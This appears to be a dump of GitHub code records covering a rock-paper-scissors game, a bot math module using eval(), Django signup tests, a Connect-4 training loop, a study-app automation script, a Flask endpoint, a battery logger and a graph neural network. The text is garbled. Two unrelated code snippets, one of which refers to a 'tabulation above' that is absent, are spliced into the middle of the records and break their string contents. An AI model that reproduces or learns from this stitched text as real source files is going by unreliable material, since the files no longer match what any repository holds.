1\r\n    elif user_answer == \"P\" and comp_answer == 1:\r\n        print(\"\\nComputer picks Rock...Paper covers Rock, YOU WIN!\")\r\n        user_score = user_score + 1\r\n        turns_left = turns_left - 1\r\n    elif user_answer == \"S\" and comp_answer == 2:\r\n        print(\"\\nComputer picks Paper...Scissors cuts Paper, YOU WIN!\")\r\n        user_score = user_score + 1\r\n        turns_left = turns_left - 1\r\n    ##user loses scenarios\r\n    elif user_answer == \"R\" and comp_answer == 2:\r\n        print(\"\\nComputer picks Paper...Paper covers Rock, you lose :(\")\r\n        computer_score = computer_score + 1\r\n        turns_left = turns_left - 1\r\n    elif user_answer == \"P\" and comp_answer ==
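# A space-optimised variant of the tabulation above (a sketch, same recurrence):
# only the previous DP row is ever read, so two rows of length m+1 suffice,
# dropping memory from O(n*m) to O(m).
def longest_common_substr(s1, s2):
    prev = [0] * (len(s2) + 1)
    best = 0
    for ch1 in s1:
        cur = [0] * (len(s2) + 1)
        for j, ch2 in enumerate(s2, start=1):
            if ch1 == ch2:
                cur[j] = prev[j - 1] + 1
                best = max(best, cur[j])
        prev = cur
    return best

assert longest_common_substr("ABCDGH", "ACDGHR") == 4  # "CDGH"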
3:\r\n        print(\"\\nComputer picks Scissors...Scissors cuts Paper, you lose :(\")\r\n        computer_score = computer_score + 1\r\n        turns_left = turns_left - 1\r\n    elif user_answer == \"S\" and comp_answer == 1:\r\n        print(\"\\nComputer picks Rock...Rock smashes Scissors, you lose :(\")\r\n        computer_score = computer_score + 1\r\n        turns_left = turns_left - 1\r\n    ##tie scenarios\r\n    elif user_answer == \"R\" and comp_answer == 1:\r\n        print(\"\\nComputer picks Rock, you tie...go again!\")\r\n    elif user_answer == \"P\" and comp_answer == 2:\r\n        print(\"\\nComputer picks Paper, you tie...go again!\")\r\n    elif user_answer == \"S\" and comp_answer == 3:\r\n        print(\"\\nComputer picks Scissors, you tie...go again!\")\r\n    ##bad user input\r\n    else:\r\n        print(\"\\nPlease only type either R , P , or S to play!\")\r\n\r\nif user_score == 2:\r\n    print(\"\\nCONGRATULATIONS! You win :)\")\r\n\r\nif computer_score == 2:\r\n    print(\"\\nThe computer beat you :( , run the program again and give it another go!\")\r\n\r\n    \r\n\r\n","repo_name":"DarthCe/python-lessons","sub_path":"rock paper scissors game.py","file_name":"rock paper scissors game.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35597195620","text":"\"\"\"Math module for semicolon.\"\"\"\r\nimport math # Used by eval() in calc()\r\nimport multiprocessing # Used because of eval() in calc()\r\nfrom array import array # Used to get the primes\r\nfrom cmds import command # Command dictionary\r\nfrom string import ascii_lowercase, ascii_uppercase, digits\r\nfrom message import Message\r\n\r\n# Fetching prime list\r\nprimesData = open('data/primes', 'rb')\r\nprimes = array('I')\r\nprimes.frombytes(primesData.read())\r\nprimesData.close()\r\n\r\n\r\n@command('calc', __name__, help='Evaluate an expression, e.g.
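# A compact alternative to the elif ladder above (a sketch, not the original
# author's code): a beats-map collapses win/lose/tie detection to three lines.
import random

BEATS = {'R': 'S', 'P': 'R', 'S': 'P'}  # each key beats its value

def judge(user, comp):
    if user == comp:
        return 'tie'
    return 'win' if BEATS[user] == comp else 'lose'

comp = random.choice('RPS')
print(judge('R', comp))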
log(sin(pi))',\r\n         usage='<expression>')\r\ndef calc_command(_):\r\n    \"\"\"Wrapper for the calc command.\"\"\"\r\n    r = calc(_['T'])\r\n    if r is None:\r\n        return Message('Over capacity')\r\n    else:\r\n        return Message(r)\r\n\r\n\r\n@command('calcb', __name__, help='Evaluate an expression (binary output).',\r\n         usage='<expression>')\r\ndef calcb_command(_):\r\n    \"\"\"Wrapper for the calc command (bin).\"\"\"\r\n    r = calc(_['T'])\r\n    if r is None:\r\n        return Message('Over capacity')\r\n    else:\r\n        return Message(bin(r).replace('0b', ''))\r\n\r\n\r\n@command('calco', __name__, help='Evaluate an expression (octal output).',\r\n         usage='<expression>')\r\ndef calco_command(_):\r\n    \"\"\"Wrapper for the calc command (oct).\"\"\"\r\n    r = calc(_['T'])\r\n    if r is None:\r\n        return Message('Over capacity')\r\n    else:\r\n        return Message(oct(r).replace('0o', ''))\r\n\r\n\r\n@command('calcx', __name__, help='Evaluate an expression (hex output).',\r\n         usage='<expression>')\r\ndef calcx_command(_):\r\n    \"\"\"Wrapper for the calc command (hex).\"\"\"\r\n    r = calc(_['T'])\r\n    if r is None:\r\n        return Message('Over capacity')\r\n    else:\r\n        return Message(hex(r).replace('0x', ''))\r\n\r\n\r\n@command('prime', __name__, help='Return the Nth prime number (up to 1e7).',\r\n         usage='<N>')\r\ndef nthprime(_):\r\n    \"\"\"Return Nth prime.\"\"\"\r\n    try:\r\n        l = list(map(int, _['P'][1:]))\r\n        if max(l) > len(primes) or min(l) < 1:\r\n            return Message('Over capacity')\r\n        return Message(' '.join([str(primes[n - 1]) for n in l]))\r\n    except:\r\n        pass\r\n\r\n\r\n@command('isprm', __name__, help='Tell if N is a prime number (up to 3e16).',\r\n         usage='<N>')\r\ndef isprim(_):\r\n    \"\"\"Wrapper for isPrime function.\"\"\"\r\n    try:\r\n        l = list(map(int, _['P'][1:]))\r\n    except:\r\n        return\r\n    answers = []\r\n    for x in l:\r\n        r = isPrime(x)\r\n        s = 'Over capacity' if r is None else str(r)\r\n        if r and x <= primes[-1]:\r\n            i = dicho(x, primes)\r\n            pref = 'th'\r\n            if i % 10 < 3 and (i // 10 % 10 != 1):\r\n                pref = ('st', 'nd', 'rd')[i % 10]\r\n            s += ' (' + str(i + 1) + pref + ')'\r\n        answers.append(s)\r\n    return Message(' '.join(answers))\r\n\r\n\r\n@command('factor', __name__, help='Factor an integer into primes.',\r\n         usage='<N>')\r\ndef factorize(_):\r\n    \"\"\"Wrapper for factor function.\"\"\"\r\n    try:\r\n        n = int(_['T'])\r\n    except:\r\n        pass\r\n    l = factor(n) if _['rank'] else factor(n, 10000)\r\n    u = {}\r\n    for x in l:\r\n        if x not in u.keys():\r\n            u[x] = 0\r\n        u[x] += 1\r\n    f = ' * '.join([str(x) + '^' + str(u[x]) for x in u.keys()]) + ' '\r\n    return Message(str(n) + ' = ' + f.replace('^1 ', ' ')[:-1])\r\n\r\n\r\ndef calc(s):\r\n    \"\"\"Evaluate the mathematical expression contained in a string.\"\"\"\r\n    # (a)cos/sin/tan(h) atan2 degrees radians\r\n    # exp log log2 log10 factorial sqrt e pi floor int\r\n    allowedMath = ['acos', 'acosh', 'asin', 'asinh', 'atan', 'atan2', 'atanh',\r\n                   'cos', 'cosh', 'degrees', 'exp', 'factorial', 'floor',\r\n                   'log', 'log2', 'log10', 'radians', 'sin', 'sinh', 'sqrt',\r\n                   'tan', 'tanh', 'e', 'pi']\r\n    s = s.lower()\r\n    s = s.replace('^', '**')\r\n    s = s.replace('int(', 'floor(')\r\n    s = s.replace('π', 'pi')\r\n    r, i = '', 0\r\n    math.pi # dummy statement to avoid F401 (flake8)\r\n    while i < len(s):\r\n        c = s[i]\r\n        # Supports binary (0b), octal (0o) and hexadecimal (0x)\r\n        if c in ascii_lowercase and c not in 'obxacdef':\r\n            func, j = c, i + 1\r\n            while j < len(s) and s[j] in ascii_lowercase + digits:\r\n                func += s[j]\r\n                j += 1\r\n            if func in allowedMath:\r\n                r += 'math.'
+ func\r\n            i = j - 1\r\n        elif c not in (ascii_uppercase + '_'):\r\n            r += c\r\n        i += 1\r\n\r\n    def calculator(expr, output):\r\n        \"\"\"Put eval(expr) on the output queue.\"\"\"\r\n        try:\r\n            result = eval(expr)\r\n        except:\r\n            result = 'ERR'\r\n        output.put(result)\r\n\r\n    q = multiprocessing.Queue()\r\n    ev = multiprocessing.Process(target=calculator, args=(r, q))\r\n    ev.start()\r\n    ev.join(2)\r\n    if ev.is_alive():\r\n        ev.terminate()\r\n        ev.join()\r\n        return None\r\n    else:\r\n        result = q.get()\r\n        if result != 'ERR':\r\n            return result\r\n\r\n\r\ndef factor(n, mx=len(primes)):\r\n    \"\"\"Return the prime factors of n, up to P(mx).\"\"\"\r\n    if not n:\r\n        return [0]\r\n    l = []\r\n    for p in primes[:mx]:\r\n        while n % p == 0:\r\n            l.append(p)\r\n            n //= p\r\n    if n in primes:\r\n        return l + [n]\r\n    if n <= primes[mx - 1] ** 2:\r\n        return l + [n]\r\n    return ['Over capacity']\r\n\r\n\r\ndef isPrime(n):\r\n    \"\"\"Tell if n is a prime number. Return None if over capacity.\"\"\"\r\n    if n in primes:\r\n        return True\r\n    for p in primes:\r\n        if n % p == 0:\r\n            return False\r\n        if n > primes[-1] ** 2:\r\n            return None\r\n    return True\r\n\r\n\r\ndef dicho(x, l):\r\n    \"\"\"Return the index of x in a sorted list, assuming x is present once.\"\"\"\r\n    a, b = 0, len(l) - 1\r\n    while l[a] != x and l[b] != x:\r\n        m = (a + b) // 2\r\n        n = l[m]\r\n        if x < n:\r\n            b = m\r\n        elif x > n:\r\n            a = m\r\n        else:\r\n            return m\r\n    return a if l[a] == x else b\r\n","repo_name":"Zeroji/semicold","sub_path":"math_.py","file_name":"math_.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27935322507","text":"\"\"\" Tests for signup page. \"\"\"\n\nimport json\nimport logging\nfrom mock import patch, Mock\nfrom django.test import TestCase, Client\nfrom utils.exception import AppMessage\nfrom utils.data import SIGNUP_DATA\nfrom custom_user.views.views_accounts import UserSignup\nfrom custom_user.models import CustomUser\nfrom unittest.mock import MagicMock\nfrom django.http import HttpRequest\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass TestSignup(TestCase):\n    \"\"\" Unit test cases for signup page. \"\"\"\n\n    def setUp(self):\n        \"\"\"Test cases setUp for class TestSignup. \"\"\"\n\n        self.client = Client()\n        self.url = '/accounts/signup/'\n        self.payload = SIGNUP_DATA\n\n        self.request = HttpRequest()\n\n    def tearDown(self):\n        CustomUser.objects.all().delete()\n\n    def test_signup_without_ajax_call(self):\n        \"\"\"Tests submitting the form without an AJAX call. \"\"\"\n\n        request = self.client.post(self.url, {})\n        response = json.loads(request.content.decode())\n        assert response['result'] is False\n        assert response['message'] == AppMessage.error['INVALID_REQUEST']\n\n    def test_signup_with_invalid_email(self):\n        \"\"\"Tests the signup page with an invalid email. \"\"\"\n        self.payload['email'] = ''\n        request = self.client.post(self.url, self.payload,\n                                   HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n        response = json.loads(request.content.decode())\n        assert response['result'] is False\n        assert response['email'][0] == 'This field is required.'\n\n    @patch('utils.common.Email.go_email')\n    def test_mock_email_for_user_signup(self, mock_email):\n        \"\"\"Mocks the email function when registering a user.
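# dicho() above hand-rolls the bisection that the standard library already
# provides; a sketch of the equivalent lookup with bisect (assumes the same
# "x is present" precondition).
from bisect import bisect_left

def index_of(x, sorted_list):
    i = bisect_left(sorted_list, x)
    if i < len(sorted_list) and sorted_list[i] == x:
        return i
    raise ValueError(f'{x} not found')

assert index_of(7, [2, 3, 5, 7, 11]) == 3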
\"\"\"\n self.request.__setattr__('HTTP_X_REQUESTED_WITH', 'XMLHttpRequest')\n self.request.__setattr__('method', 'POST')\n self.request.is_ajax = MagicMock(return_value=True)\n self.request.POST.update(self.payload)\n\n # view\n view = UserSignup()\n view.request = self.request\n mock_email.return_value = True\n response = view.post(self.request)\n content = json.loads(response.content.decode())\n\n assert response.status_code == 201\n assert content['result'] is True\n assert content['message'] == AppMessage.success['SIGNUP_SUCCESS']\n","repo_name":"atanudey/faradayfinder","sub_path":"tests/unit_tests/test_signup.py","file_name":"test_signup.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42972769423","text":"import numpy as np\nimport random, sys\n\ndef playTrainingGames(n, game, model, opponent, discountFactor=0.9, exploit=1):\n '''\n Plays n games between model and opponent. \\n\n Returns the data of all the games which can be used for training. \\n \n \n exploit -- The chance of selecting chosen move (complement of selecting random move)\n '''\n\n # Each move in each game adds an element to these arrays\n states = [] # A state\n actions = [] # Index of action made from state\n sPrimes = [] # The resultant state of each state-action pair \n qValues = [] # These are discarded after network is trained once\n\n # One element per game is added to this array\n winners = []\n\n for k in range(n):\n\n while True:\n if game.turn == 1:\n\n move = game.getMove(model, exploit)\n winner = game.move(move[\"move\"])\n\n # Add state-action pair to memory\n states.append(move[\"state\"])\n actions.append(move[\"move\"])\n\n # Add qValue for next move to memory\n if game.turnNum > 1:\n qValues.append(\n move[\"qValue\"] * discountFactor\n )\n\n # Append the resultant state from the previous move\n sPrimes.append(move[\"state\"])\n \n else:\n winner = opponent.playMove()\n\n if winner != None:\n if winner == 1:\n qValues.append(np.array([1]))\n sPrimes.append(1)\n # winMoves += [1]*(len(saPairs)-len(winMoves))\n else:\n qValues.append(np.array([0]))\n sPrimes.append(0)\n # winMoves += [0]*(len(saPairs)-len(winMoves))\n break\n\n winners.append(winner)\n\n\n # sys.exit()\n\n # game.printGame()\n # print(\"winner #{}: {}\".format(k, winner))\n print(\"Game #{}/{}\".format(k+1,n), end='\\r')\n\n game.resetGame()\n\n return {\n \"states\": np.array(states),\n \"actions\": np.array(actions),\n \"sPrimes\": np.array(sPrimes),\n \"qValues\": np.array(qValues),\n # \"winMoves\": np.array(winMoves), # The predicted values for winning by playing each move\n \"winners\": winners\n }\n","repo_name":"mattyhempstead/tensorflow-experiments","sub_path":"connect4/v5/playTrainingGames.py","file_name":"playTrainingGames.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37741682543","text":"import math\nimport os\nimport sys\nimport time\nfrom sys import argv\n\nfrom pdlearn import boot\n\nboot.check_environment()\ntry:\n # 在此处导入所有 pdlearn 内的模块\n from pdlearn import globalvar as gl\n from pdlearn import color, score, threads, user, version\n from pdlearn.answer_question import daily, weekly, zhuanxiang\n from pdlearn.article_video import article, video\n from pdlearn.config import cfg_get\n from pdlearn.mydriver import Mydriver\n from pdlearn.score import show_score, show_scorePush\nexcept ImportError as e:\n 
boot.try_pip_install(exception=e)\n\n\ndef get_argv():\n if gl.is_init != True:\n gl.init_global()\n if len(argv) > 2:\n if argv[2] == \"hidden\":\n gl.nohead = True\n elif argv[2] == \"show\":\n gl.nohead = False\n if len(argv) > 3:\n if argv[3] == \"single\":\n gl.lock = True\n elif argv[3] == \"multithread\":\n gl.lock = False\n if len(argv) > 4:\n if argv[4].isdigit():\n gl.stime = argv[4]\n return gl.nohead, gl.lock, gl.stime, gl.single\n\n\ndef start_learn(uid, name):\n # 0 读取版本信息\n start_time = time.time()\n nohead, lock, stime, Single = get_argv()\n print(\"是否无头模式:{0} {1}\".format(nohead, os.getenv('Nohead')))\n cookies = user.get_cookie(uid)\n if nohead == True:\n TechXueXi_mode = \"3\"\n else:\n TechXueXi_mode = str(cfg_get(\"base.ModeType\", 3))\n print(\"当前选择模式:\" + TechXueXi_mode + \"\\n\" + \"=\" * 60)\n\n if not name:\n user_fullname = user.get_fullname(uid)\n name = user_fullname.split('_', 1)[1]\n else:\n user_fullname = uid+\"_\"+name\n\n if not cookies or TechXueXi_mode == \"0\":\n msg = \"\"\n if name == \"新用户\":\n msg = \"需要增加新用户,请扫码登录,否则请无视\"\n else:\n msg = name+\" 登录信息失效,请重新扫码\"\n # print(msg)\n gl.pushprint(msg, chat_id=uid)\n if gl.pushmode == \"6\":\n gl.pushprint(\"web模式跳过自动获取二维码,请手动点击添加按钮\", chat_id=uid)\n print(color.red(\"【#️⃣】 若直接退出请运行:webserverListener.py\"))\n return\n driver_login = Mydriver()\n cookies = driver_login.login()\n driver_login.quit()\n # cookies = login()\n if not cookies:\n print(\"登录超时\")\n return\n user.save_cookies(cookies)\n uid = user.get_userId(cookies)\n user_fullname = user.get_fullname(uid)\n name = user_fullname.split('_', 1)[1]\n user.update_last_user(uid)\n output = name + \" 登录正常,开始学习...\\n\"\n\n article_index = user.get_article_index(uid)\n video_index = 1 # user.get_video_index(uid)\n\n total, scores = show_score(cookies)\n gl.pushprint(output, chat_id=uid)\n if TechXueXi_mode in [\"1\", \"3\"]:\n\n article_thread = threads.MyThread(\n \"文章学 xi \", article, uid, cookies, article_index, scores, lock=lock)\n video_thread = threads.MyThread(\n \"视频学 xi \", video, uid, cookies, video_index, scores, lock=lock)\n article_thread.start()\n video_thread.start()\n article_thread.join()\n video_thread.join()\n if TechXueXi_mode in [\"2\", \"3\"]:\n# print('开始每日答题……')\n# daily(cookies, scores)\n print('开始每周答题……')\n weekly(cookies, scores)\n if nohead != True or gl.zhuanxiang == True:\n print('开始专项答题……')\n zhuanxiang(cookies, scores)\n\n if TechXueXi_mode == \"4\":\n user.select_user()\n if TechXueXi_mode == \"5\":\n user.refresh_all_cookies(display_score=True)\n if TechXueXi_mode == \"6\":\n user.refresh_all_cookies(live_time=11.90)\n\n seconds_used = int(time.time() - start_time)\n gl.pushprint(name+\" 总计用时 \" + str(math.floor(seconds_used / 60)) +\n \" 分 \" + str(seconds_used % 60) + \" 秒\", chat_id=uid)\n show_scorePush(cookies, chat_id=uid)\n try:\n user.shutdown(stime)\n except Exception as e:\n pass\n\n\ndef start(nick_name=None):\n nohead, lock, stime, Single = get_argv()\n info_shread = threads.MyThread(\"获取更新信息...\", version.up_info)\n info_shread.start()\n user_list = user.list_user(printing=False)\n user.refresh_all_cookies()\n if len(user_list) == 0:\n user_list.append([\"\", \"新用户\"])\n for i in range(len(user_list)):\n try:\n if nick_name is None or nick_name == user_list[i][1] or nick_name == user_list[i][0]:\n _learn = threads.MyThread(\n user_list[i][0]+\"开始学xi\", start_learn, user_list[i][0], user_list[i][1], lock=Single)\n _learn.start()\n except:\n gl.pushprint(\"学习页面崩溃,学习终止\")\n\n\ndef get_my_score(uid):\n 
get_argv()\n user.refresh_all_cookies()\n cookies = user.get_cookie(uid)\n if not cookies:\n return False\n show_scorePush(cookies, chat_id=uid)\n return True\n\n\ndef get_user_list():\n get_argv()\n dic = user.refresh_all_cookies(display_score=True)\n values = dic.values()\n msg = \"\"\n for v in values:\n msg += v+\"\\n\"\n if msg == \"\":\n msg = \"cookie全部过期,请重新登录\"\n return msg\n\n\ndef get_all_user_name():\n user_list = user.list_user(printing=False)\n names = []\n for i in range(len(user_list)):\n names.append(user_list[i][1])\n return names\n\n\ndef add_user(chat_id=None):\n get_argv()\n gl.pushprint(\"请登录(登录方式请仔细阅读文档,如果觉得这是让你下载,就是你没仔细读文档):\", chat_id=chat_id)\n driver_login = Mydriver()\n cookies = driver_login.login(chat_id)\n driver_login.quit()\n # cookies = login(chat_id=chat_id)\n if not cookies:\n gl.pushprint(\"登录超时。\", chat_id=chat_id)\n return\n user.save_cookies(cookies)\n uid = user.get_userId(cookies)\n user_fullname = user.get_fullname(uid)\n user.update_last_user(uid)\n gl.pushprint(user_fullname+\"登录成功\", chat_id=chat_id)\n\n\nif __name__ == '__main__':\n if(cfg_get('display.banner') != False): # banner文本直接硬编码,不要放在conf中\n print(\"=\" * 60 +\n '\\n 我们的网站,GitHub 等页面已经被中国大陆的浏览器加入黑名单,请用谷歌浏览器 chrome 打开我们的站点。' +\n '\\n 科技强 guo 官方网站:https://techxuexi.js.org' +\n '\\n Github地址:https://github.com/TechXueXi' +\n '\\n使用本项目,必须接受以下内容,否则请立即退出:' +\n '\\n - TechXueXi 仅额外提供给“爱党爱 guo ”且“工作学业繁重”的人' +\n '\\n - 项目开源协议 LGPL-3.0' +\n '\\n - 不得利用本项目盈利' +\n '\\n另外,我们建议你参与一个维护劳动法的项目:' +\n '\\nhttps://996.icu/ 或 https://github.com/996icu/996.ICU/blob/master/README_CN.md')\n print(\"=\" * 60, '''\\nTechXueXi 现支持以下模式(答题时请值守电脑旁处理少部分不正常的题目):''')\n print(cfg_get('base.ModeText', \"\") + '\\n' + \"=\" * 60)\n # 模式提示文字请在 ./config/default_template.conf 处修改。\n start()\n","repo_name":"TechXueXi/TechXueXi","sub_path":"SourcePackages/pandalearning.py","file_name":"pandalearning.py","file_ext":"py","file_size_in_byte":7445,"program_lang":"python","lang":"en","doc_type":"code","stars":5402,"dataset":"github-code","pt":"32"} +{"seq_id":"26476971291","text":"from flask_apispec import MethodResource\nfrom flask_apispec import use_kwargs, doc\nfrom flask_jwt_extended import fresh_jwt_required\nfrom flask_restful import Resource\nfrom webargs import fields, validate\nfrom decorator.verify_admin_access import verify_admin_access\n\nfrom db.db import DB\nfrom decorator.catch_exception import catch_exception\nfrom decorator.log_request import log_request\nfrom utils.serializer import Serializer\n\n\nclass GetCampaigns(MethodResource, Resource):\n\n def __init__(self, db: DB):\n self.db = db\n\n @log_request\n @doc(tags=['campaign'],\n description='Get campaigns',\n responses={\n \"200\": {},\n })\n @use_kwargs({\n 'page': fields.Int(required=False, missing=1, validate=validate.Range(min=1)),\n 'per_page': fields.Int(required=False, missing=50, validate=validate.Range(min=1, max=50)),\n }, location=\"query\")\n @fresh_jwt_required\n @verify_admin_access\n @catch_exception\n def get(self, **kwargs):\n\n query = self.db.session \\\n .query(self.db.tables[\"Campaign\"]) \\\n .order_by(self.db.tables[\"Campaign\"].id.desc())\n paginate = query.paginate(kwargs['page'], kwargs['per_page'])\n campaigns = Serializer.serialize(paginate.items, self.db.tables[\"Campaign\"])\n\n return {\n \"pagination\": {\n \"page\": kwargs['page'],\n \"pages\": paginate.pages,\n \"per_page\": kwargs['per_page'],\n \"total\": paginate.total,\n },\n \"items\": campaigns,\n }, \"200 
\"\n","repo_name":"CybersecurityLuxembourg/openxeco-core","sub_path":"oxe-api/resource/campaign/get_campaigns.py","file_name":"get_campaigns.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"11949806427","text":"import smbus\nimport time\nimport sys\nfrom ina219 import INA219\n\nclass PowerFormatting:\n FULL = 0x01\n SHORT = 0x02\n PERCENT = 0x03\n CURRENT = 0x04\n\ndef read(ina219, parameter):\n\n voltage = ina219.getBusVoltage_V() # voltage on V- (load side)\n shunt_voltage = ina219.getShuntVoltage_mV() / 1000 # voltage between V+ and V- across the shunt\n current = ina219.getCurrent_mA() # current in mA\n power = ina219.getPower_W() # power in W\n percent = (voltage - 6)/2.4*100\n if(percent > 100):percent = 100\n if(percent < 0):percent = 0\n result = \"\"\n if(PowerFormatting.FULL == parameter):\n result = printlong(voltage, current, power, percent)\n elif(PowerFormatting.SHORT == parameter):\n result = printshort(voltage, current, power, percent)\n elif(PowerFormatting.PERCENT == parameter):\n result = \"{0}\".format(int(percent))\n elif(PowerFormatting.CURRENT == parameter):\n result = \"{0}\".format(int(current))\n return result\n\ndef printlong(voltage, current, power, percent):\n discharge = \"\"\n if(current < 0):\n discharge = \"dis\"\n print(\"Load Voltage:\\t\\t{:6.3f} V\".format(voltage))\n print(\"Battery {0}charging\\t{1:9.6f} A\".format(discharge, current/1000))\n print(\"Power:\\t\\t\\t{:6.3f} W\".format(power))\n print(\"Percent:\\t\\t{:3.1f}%\".format(percent))\n return \"\"\n\ndef printshort(voltage, current, power, percent):\n return \"{0},{1},{2:1.3f},{3}\".format(int(voltage*100), int(current), power, int(percent))\n\nif __name__=='__main__':\n ina219 = INA219(addr=0x42)\n read(ina219, 0)\n time.sleep(2)\n if(len(sys.argv) > 1):\n result = \"\"\n if(sys.argv[1] == \"percent\"):\n result = read(ina219, PowerFormatting.PERCENT)\n elif(sys.argv[1] == \"current\"):\n result = read(ina219, PowerFormatting.CURRENT)\n else:\n result = read(ina219, PowerFormatting.SHORT)\n print(result)\n else:\n read(ina219, PowerFormatting.FULL)\n","repo_name":"jscoobyced/raspi-utils","sub_path":"ina219/powerlog.py","file_name":"powerlog.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24293350430","text":"import torch.nn as nn\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GCNConv, NNConv, GINConv, GATConv, global_add_pool, Set2Set\n\n\nclass GCN(nn.Module):\n def __init__(self, n_features, hidden_dim, n_classes, n_conv_layers=3, dropout=0,\n conv_type=\"MPNN\", set2set_pooling=False, node_classification=True, softmax=False,\n probability=True, batch_norm=True, num_embeddings=None, embedding_dim=20,\n residuals=False, device=\"cpu\"):\n super(GCN, self).__init__()\n if num_embeddings:\n self.embedding = nn.Embedding(num_embeddings=num_embeddings, embedding_dim=embedding_dim)\n\n self.convs = nn.ModuleList()\n self.batch_norms = nn.ModuleList()\n\n # First layer\n self.convs.append(self.get_conv_layer(n_features, hidden_dim, conv_type=conv_type))\n self.batch_norms.append(nn.BatchNorm1d(hidden_dim))\n\n # Hidden layers\n for i in range(n_conv_layers - 1):\n self.convs.append(self.get_conv_layer(hidden_dim, hidden_dim, conv_type=conv_type))\n self.batch_norms.append(nn.BatchNorm1d(hidden_dim))\n\n # Fully connected layer\n self.fc = nn.Linear(hidden_dim, 
n_classes)\n\n # if residuals:\n # self.fc = nn.Linear(n_conv_layers * hidden_dim, n_classes)\n\n # If we are interested in graph classification, we introduce the final pooling and change\n # the fc layer to have dimensions compatible with the output of the Set2Set model\n if set2set_pooling:\n self.fc = nn.Linear(2 * hidden_dim, n_classes)\n self.pooling = Set2Set(hidden_dim, processing_steps=10)\n\n self.dropout = nn.Dropout(dropout)\n\n self.conv_type = conv_type\n self.node_classification = node_classification\n self.softmax = softmax\n self.probability = probability\n self.batch_norm = batch_norm\n self.num_embeddings = num_embeddings\n self.set2set_pooling = set2set_pooling\n self.residuals = residuals\n self.device = device\n\n def forward(self, data):\n x, adj, edge_attr, batch = data.x, data.edge_index, data.edge_attr, data.batch\n # poolings = torch.Tensor([]).to(self.device)\n\n if self.num_embeddings:\n x = self.embedding(x)\n x = self.dropout(x)\n\n # Apply graph convolutional layers\n for i, conv in enumerate(self.convs):\n x = self.apply_conv_layer(conv, x, adj, edge_attr, conv_type=self.conv_type)\n x = self.batch_norms[i](x) if self.batch_norm else x\n x = nn.functional.leaky_relu(x)\n x = self.dropout(x)\n\n # if self.residuals:\n # poolings = torch.cat((poolings, global_add_pool(x, batch)), dim=1)\n\n # If we are interested in graph classification, apply graph-wise pooling\n if not self.node_classification: # and not self.residuals:\n if self.set2set_pooling:\n x = self.pooling(x, batch)\n else:\n x = global_add_pool(x, batch)\n x = self.dropout(x)\n\n # if self.residuals:\n # x = self.dropout(poolings)\n\n x = self.fc(x)\n\n # if not self.node_classification:\n # if self.probability:\n # return torch.sigmoid(x)\n # else:\n # return x\n\n return F.log_softmax(x, dim=1) if not self.softmax else F.softmax(x, dim=1)\n\n @staticmethod\n def get_conv_layer(n_input_features, n_output_features, conv_type=\"GCN\"):\n if conv_type == \"GCN\":\n return GCNConv(n_input_features, n_output_features)\n elif conv_type == \"GAT\":\n return GATConv(n_input_features, n_output_features)\n elif conv_type == \"MPNN\":\n net = nn.Sequential(nn.Linear(2, 10), nn.ReLU(), nn.Linear(10, n_input_features *\n n_output_features))\n return NNConv(n_input_features, n_output_features, net)\n elif conv_type == \"GIN\":\n net = nn.Sequential(nn.Linear(n_input_features, n_output_features), nn.ReLU(),\n nn.Linear(n_output_features, n_output_features))\n return GINConv(net)\n else:\n raise Exception(\"{} convolutional layer is not supported.\".format(conv_type))\n\n @staticmethod\n def apply_conv_layer(conv, x, adj, edge_attr, conv_type=\"GCN\"):\n if conv_type in [\"GCN\", \"GAT\", \"GIN\"]:\n return conv(x, adj)\n elif conv_type in [\"MPNN\"]:\n return conv(x, adj, edge_attr)\n else:\n raise Exception(\"{} convolutional layer is not supported.\".format(conv_type))\n","repo_name":"emalgorithm/ncRNA-family-prediction","sub_path":"src/model/gcn.py","file_name":"gcn.py","file_ext":"py","file_size_in_byte":4714,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"40380704435","text":"from datetime import timedelta\n\nfrom django.urls import path\n\nfrom .base import DomainEmailValidator\nfrom .external import ExternalLoginView, ExternalGetCodeView\n\n\nclass LoginView(ExternalLoginView):\n template_context = {'provider_name': '浙江大学'}\n provider = 'zju'\n group = 'zju'\n\n\nclass GetCodeView(ExternalGetCodeView):\n provider = 'zju'\n duration = 
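# global_add_pool in the GCN above sums node features per graph using the batch
# vector; a plain-PyTorch sketch of that operation (assumes torch is installed,
# no torch_geometric needed).
import torch

def global_add_pool_sketch(x, batch, num_graphs):
    out = torch.zeros(num_graphs, x.size(1), dtype=x.dtype)
    return out.index_add_(0, batch, x)  # row i of x is added to graph batch[i]

x = torch.ones(5, 3)                   # 5 nodes, 3 features each
batch = torch.tensor([0, 0, 0, 1, 1])  # first graph has 3 nodes, second has 2
print(global_add_pool_sketch(x, batch, num_graphs=2))
# tensor([[3., 3., 3.], [2., 2., 2.]])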
